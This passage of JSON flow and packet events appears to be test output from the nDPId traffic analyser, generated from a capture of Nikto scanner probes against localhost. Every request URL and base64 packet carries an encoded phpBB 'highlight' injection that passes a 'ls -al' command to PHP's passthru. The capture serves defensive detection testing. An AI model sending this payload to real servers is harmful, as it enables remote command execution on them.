{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_packet_id":1,"flow_last_seen":1576420277804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277804,"pkt":"AAAAAAAAAAAAAAAACABFAAFsoC9AAEAGm1p\/AAABfwAAAcb6H5AztpkH42OkkoAYAED\/YAAAAQEICp1m\/1SdZv9UR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_packet_id":1,"flow_last_seen":1576420277807,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277807,"pkt":"AAAAAAAAAAAAAAAACABFAAFsAqdAAEAGOON\/AAABfwAAAcb8H5ASjTuPR79V4YAYAED\/YAAAAQEICp1m\/1edZv9XR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_packet_id":1,"flow_last_seen":1576420277808,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277808,"pkt":"AAAAAAAAAAAAAAAACABFAAFnxERAAEAGd0p\/AAABfwAAAcb+H5AIB\/1vYBeRA4AYAED\/WwAAAQEICp1m\/1idZv9YR0VUIC9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7560000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00905{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_packet_id":1,"flow_last_seen":1576420277810,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"thread_ts_msec":1576420277810,"pkt":"AAAAAAAAAAAAAAAACABFAAFwFdRAAEAGJbJ\/AAABfwAAAccAH5A7eCz\/38X+m4AYAED\/ZAAAAQEICp1m\/1mdZv9ZR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01234{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7560000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7560000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_packet_id":1,"flow_last_seen":1576420277811,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1576420277811,"pkt":"AAAAAAAAAAAAAAAACABFAAF1vbdAAEAGfcl\/AAABfwAAAccCH5DikYSaCicX\/4AYAED\/aQAAAQEICp1m\/1udZv9bR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01240{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7560000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_packet_id":1,"flow_last_seen":1576420277812,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277812,"pkt":"AAAAAAAAAAAAAAAACABFAAFvwN5AAEAGeqh\/AAABfwAAAccEH5A7SvnykFHzA4AYAED\/YwAAAQEICp1m\/1ydZv9cR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCg0K"} +01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7560000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_packet_id":1,"flow_last_seen":1576420277813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277813,"pkt":"AAAAAAAAAAAAAAAACABFAAFt2OpAAEAGYp5\/AAABfwAAAccGH5BS6uHGYiCIs4AYAED\/YQAAAQEICp1m\/12dZv9dR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_packet_id":1,"flow_last_seen":1576420277814,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277814,"pkt":"AAAAAAAAAAAAAAAACABFAAFt1fZAAEAGZZJ\/AAABfwAAAccIH5Bl1OzaDJYmQ4AYAED\/YQAAAQEICp1m\/16dZv9eR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7560000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_packet_id":1,"flow_last_seen":1576420277816,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277816,"pkt":"AAAAAAAAAAAAAAAACABFAAFmyD5AAEAGc1F\/AAABfwAAAccKH5CvpPET10Ucz4AYAED\/WgAAAQEICp1m\/2CdZv9gR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 